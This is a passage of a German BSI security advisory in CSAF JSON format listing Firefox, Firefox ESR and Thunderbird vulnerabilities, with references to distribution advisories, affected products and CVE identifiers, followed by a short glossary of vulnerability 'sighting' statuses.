"summary": "Oracle Linux Security Advisory ELSA-2026-10766 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10766.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10767 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10767"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10757 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10757"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:21383-1 vom 2026-04-28",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025725.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1649-1 vom 2026-04-29",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025757.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1650-1 vom 2026-04-29",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025756.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-12285 vom 2026-05-01",
"url": "https://linux.oracle.com/errata/ELSA-2026-12285.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10766 vom 2026-04-30",
"url": "https://errata.build.resf.org/RLSA-2026:10766"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12285 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12285"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13537 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13537"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20664-1 vom 2026-05-04",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VYPE5WKCCCIM4I2XJFAO2S7QLLSWQCSW/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-13537 vom 2026-05-06",
"url": "https://linux.oracle.com/errata/ELSA-2026-13537.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:13537 vom 2026-05-07",
"url": "https://errata.build.resf.org/RLSA-2026:13537"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1741-1 vom 2026-05-07",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-May/025930.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:12285 vom 2026-05-07",
"url": "https://errata.build.resf.org/RLSA-2026:12285"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:15892 vom 2026-05-11",
"url": "https://access.redhat.com/errata/RHSA-2026:15892"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-15892 vom 2026-05-11",
"url": "https://linux.oracle.com/errata/ELSA-2026-15892.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17689 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17689"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17688 vom 2026-05-15",
"url": "https://access.redhat.com/errata/RHSA-2026:17688"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17687 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17687"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17477 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17477"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:15892 vom 2026-05-13",
"url": "https://errata.build.resf.org/RLSA-2026:15892"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17690 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17690"
},
{
"category": "external",
"summary": "PoC CVE-2026-33626 vom 2026-05-14",
"url": "https://github.com/rootdirective-sec/CVE-2026-33626-Lab"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19466 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19466"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19041 vom 2026-05-19",
"url": "https://access.redhat.com/errata/RHSA-2026:19041"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19201 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19201"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19131 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19131"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19461 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19461"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19462 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19462"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19465 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19465"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19467 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19467"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:19201 vom 2026-05-20",
"url": "https://errata.build.resf.org/RLSA-2026:19201"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19348 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19348"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19464 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19464"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19468 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19468"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19542 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19542"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19469 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19463 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19463"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19655 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19655"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19704 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19704"
}
],
"source_lang": "en-US",
"title": "Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-20T22:00:00.000+00:00",
"generator": {
"date": "2026-05-21T07:57:26.231+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1228",
"initial_release_date": "2026-04-21T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-04-21T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-04-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2026-04-23T22:00:00.000+00:00",
"number": "3",
"summary": "Anpassung CVSS Bewertung gem\u00e4\u00df NVD Angaben"
},
{
"date": "2026-04-26T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von openSUSE und Debian aufgenommen"
},
{
"date": "2026-04-27T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Oracle Linux, Red Hat und openSUSE aufgenommen"
},
{
"date": "2026-04-28T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Rocky Enterprise Software Foundation und SUSE aufgenommen"
},
{
"date": "2026-05-03T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Oracle Linux, Rocky Enterprise Software Foundation und Red Hat aufgenommen"
},
{
"date": "2026-05-04T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat und openSUSE aufgenommen"
},
{
"date": "2026-05-05T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-05-06T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-07T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von SUSE und Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-10T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-11T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat und Rocky Enterprise Software Foundation, sowie PoC f\u00fcr CVE-2026-33626 aufgenommen"
},
{
"date": "2026-05-19T22:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von Red Hat und Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-20T22:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "16"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Firefox \u003c150",
"product_id": "T053198"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Firefox 150",
"product_id": "T053198-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox:150"
}
}
}
],
"category": "product_name",
"name": "Firefox"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Firefox ESR \u003c140.10",
"product_id": "T053196"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Firefox ESR 140.10",
"product_id": "T053196-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:140.10"
}
}
},
{
"category": "product_version_range",
"name": "\u003c115.35",
"product": {
"name": "Mozilla Firefox ESR \u003c115.35",
"product_id": "T053197"
}
},
{
"category": "product_version",
"name": "115.35",
"product": {
"name": "Mozilla Firefox ESR 115.35",
"product_id": "T053197-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:115.35"
}
}
}
],
"category": "product_name",
"name": "Firefox ESR"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Thunderbird \u003c140.10",
"product_id": "T053194"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Thunderbird 140.10",
"product_id": "T053194-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:140.10"
}
}
},
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Thunderbird \u003c150",
"product_id": "T053195"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Thunderbird 150",
"product_id": "T053195-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:150"
}
}
}
],
"category": "product_name",
"name": "Thunderbird"
}
],
"category": "vendor",
"name": "Mozilla"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "RESF Rocky Linux 9",
"product_id": "T054059",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:9"
}
}
}
],
"category": "product_name",
"name": "Rocky Linux"
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "8.8",
"product": {
"name": "Red Hat Enterprise Linux 8.8",
"product_id": "T054056",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:8.8"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-2781",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-2781"
},
{
"cve": "CVE-2026-33626",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-33626"
},
{
"cve": "CVE-2026-6746",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6746"
},
{
"cve": "CVE-2026-6747",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6747"
},
{
"cve": "CVE-2026-6748",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6748"
},
{
"cve": "CVE-2026-6749",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6749"
},
{
"cve": "CVE-2026-6750",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6750"
},
{
"cve": "CVE-2026-6751",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6751"
},
{
"cve": "CVE-2026-6752",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6752"
},
{
"cve": "CVE-2026-6753",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6753"
},
{
"cve": "CVE-2026-6754",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6754"
},
{
"cve": "CVE-2026-6755",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6755"
},
{
"cve": "CVE-2026-6756",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6756"
},
{
"cve": "CVE-2026-6757",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6757"
},
{
"cve": "CVE-2026-6758",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6758"
},
{
"cve": "CVE-2026-6759",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6759"
},
{
"cve": "CVE-2026-6760",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6760"
},
{
"cve": "CVE-2026-6761",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6761"
},
{
"cve": "CVE-2026-6762",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6762"
},
{
"cve": "CVE-2026-6763",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6763"
},
{
"cve": "CVE-2026-6764",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6764"
},
{
"cve": "CVE-2026-6765",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6765"
},
{
"cve": "CVE-2026-6766",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6766"
},
{
"cve": "CVE-2026-6767",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6767"
},
{
"cve": "CVE-2026-6768",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6768"
},
{
"cve": "CVE-2026-6769",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6769"
},
{
"cve": "CVE-2026-6770",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6770"
},
{
"cve": "CVE-2026-6771",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6771"
},
{
"cve": "CVE-2026-6772",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6772"
},
{
"cve": "CVE-2026-6773",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6773"
},
{
"cve": "CVE-2026-6774",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6774"
},
{
"cve": "CVE-2026-6775",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6775"
},
{
"cve": "CVE-2026-6776",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6776"
},
{
"cve": "CVE-2026-6777",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6777"
},
{
"cve": "CVE-2026-6778",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6778"
},
{
"cve": "CVE-2026-6779",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6779"
},
{
"cve": "CVE-2026-6780",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6780"
},
{
"cve": "CVE-2026-6781",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6781"
},
{
"cve": "CVE-2026-6782",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6782"
},
{
"cve": "CVE-2026-6783",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6783"
},
{
"cve": "CVE-2026-6784",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6784"
},
{
"cve": "CVE-2026-6785",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6785"
},
{
"cve": "CVE-2026-6786",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6786"
}
]
}
Sightings
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.